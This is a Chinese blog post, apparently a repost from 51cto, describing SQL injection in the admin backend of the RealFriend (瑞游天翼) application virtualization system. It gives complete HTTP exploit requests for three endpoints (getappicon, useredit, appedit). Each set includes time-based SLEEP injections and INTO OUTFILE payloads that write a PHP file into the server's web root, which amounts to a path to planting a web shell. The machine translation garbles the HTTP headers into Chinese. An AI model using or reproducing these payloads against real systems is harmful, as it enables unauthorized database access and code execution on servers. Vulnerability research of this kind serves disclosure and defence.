近日,网络上披露了瑞游天翼应用虚拟化系统的一个SQL注入漏洞。经排查,我们发现后台也存在SQL注入漏洞。
重点关注传入参数可控且与SQL 语句耦合的代码。
getappicon
首先检测登录状态,然后通过GET获取的参数ID直接连接到SQL语句。
登录后复制
GET /hmrao.php?s=/Admin/getappicon/id=1\’);SELECT+SLEEP(5)+AND(\’1 HTTP/1.1
主机: 192.168.222.145
不安全的升级请求: 1
User-Agent: Mozilla/5.0(Windows NT 10.0;Win64;x64) AppleWebKit/537.36(KHTML、Gecko 等) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
参考: http://192.168.222.145/hmrao.php
Accept-Encoding: gzip、deflate
接受语言: zh-CN,zh;q=0.9
Cookie: PHPSESSID=c3gnn42nnfafaei5im0ti44tp2; think_lang=zh-CN;
关闭连接:
1.2.3.4.5.6.7.8.9.10。
打印出执行的SQL语句,发现SQL成功关闭。
登录后复制
GET /hmrao.php?s=/Admin/getappicon/id=1\’);select%20\’?php%20phpinfo();\’%20into%20outfile%20%27C:\\\\Program%20Files%20(x86) \\\\RealFriend\\\\Rap%20Server\\\\WebRoot\\\\test1.php%27%23 HTTP/1.1
主机: 192.168.222.145
不安全的升级请求: 1
User-Agent: Mozilla/5.0(Windows NT 10.0;Win64;x64) AppleWebKit/537.36(KHTML、Gecko 等) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
参考: http://192.168.222.145/hmrao.php
Accept-Encoding: gzip、deflate
接受语言: zh-CN,zh;q=0.9
Cookie: PHPSESSID=c3gnn42nnfafaei5im0ti44tp2; think_lang=zh-CN;
关闭连接:
1.2.3.4.5.6.7.8.9.10。
文件已成功写入根目录。
useredit
首先检测登录状态,然后通过GET获取的参数ID直接连接到SQL语句。
这里可以看到检测登录状态的函数是adminchecklogin。
这里的发现是基于路由sessId的,所以我们需要将cookie连接到路由器上。
登录后复制
GET /hmrao.php?s=/Admin/useredit/sessId/c3gnn42nnfafaei5im0ti44tp2uid=1\’);SELECT+SLEEP(5)%23 HTTP/1.1
主机: 192.168.222.145
不安全的升级请求: 1
User-Agent: Mozilla/5.0(Windows NT 10.0;Win64;x64) AppleWebKit/537.36(KHTML、Gecko 等) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
参考: http://192.168.222.145/hmrao.php
Accept-Encoding: gzip、deflate
接受语言: zh-CN,zh;q=0.9
Cookie: PHPSESSID=c3gnn42nnfafaei5im0ti44tp2; think_lang=zh-CN;
关闭连接:
1.2.3.4.5.6.7.8.9.10。
登录后复制
GET /hmrao.php?s=/Admin/useredit/sessId/c3gnn42nnfafaei5im0ti44tp2uid=1\’);select%20\’?php%20phpinfo();\’%20into%20outfile%20%27C:\\\\Program%20Files%20( x86)\\\\RealFriend\\\\Rap%20Server\\\\WebRoot\\\\test2.php%27%23 HTTP/1.1
主机: 192.168.222.145
不安全的升级请求: 1
User-Agent: Mozilla/5.0(Windows NT 10.0;Win64;x64) AppleWebKit/537.36(KHTML、Gecko 等) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
参考: http://192.168.222.145/hmrao.php
Accept-Encoding: gzip、deflate
接受语言: zh-CN,zh;q=0.9
Cookie: PHPSESSID=c3gnn42nnfafaei5im0ti44tp2; think_lang=zh-CN;
关闭连接:
1.2.3.4.5.6.7.8.9.10。
文件已成功写入根目录。
appedit
首先检测登录状态,然后通过GET获取的参数ID直接连接到SQL语句。
这里检测登录状态的函数也是adminchecklogin
所以cookie也需要和路由相连接。
登录后复制
GET /hmrao.php?s=/Admin/appedit/sessId/c3gnn42nnfafaei5im0ti44tp2id=0\’);select+sleep(5)%23 HTTP/1.1
主机: 192.168.222.145
不安全的升级请求: 1
User-Agent: Mozilla/5.0(Windows NT 10.0;Win64;x64) AppleWebKit/537.36(KHTML、Gecko 等) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
参考: http://192.168.222.145/hmrao.php
Accept-Encoding: gzip、deflate
接受语言: zh-CN,zh;q=0.9
Cookie: PHPSESSID=c3gnn42nnfafaei5im0ti44tp2; think_lang=zh-CN;
关闭连接:
1.2.3.4.5.6.7.8.9.10。
登录后复制
GET /hmrao.php?s=/Admin/appedit/sessId/c3gnn42nnfafaei5im0ti44tp2id=0\’);select%20\’?php%20phpinfo();\’%20into%20outfile%20%27C:\\\\Program%20Files%20( x86)\\\\RealFriend\\\\Rap%20Server\\\\WebRoot\\\\test.php%27%23 HTTP/1.1
主机: 192.168.222.145
不安全的升级请求: 1
User-Agent: Mozilla/5.0(Windows NT 10.0;Win64;x64) AppleWebKit/537.36(KHTML、Gecko 等) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
参考: http://192.168.222.145/hmrao.php
Accept-Encoding: gzip、deflate
接受语言: zh-CN,zh;q=0.9
Cookie: PHPSESSID=c3gnn42nnfafaei5im0ti44tp2; think_lang=zh-CN;
关闭连接:
1.2.3.4.5.6.7.8.9.10。
文件已成功写入根目录。
原作者: u_14601424 转载来源: https://blog.51cto.com/u_14601424/11335754
#瑞游天翼以上有关应用虚拟化系统SQL注入漏洞的相关内容摘自互联网,供大家参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92904.html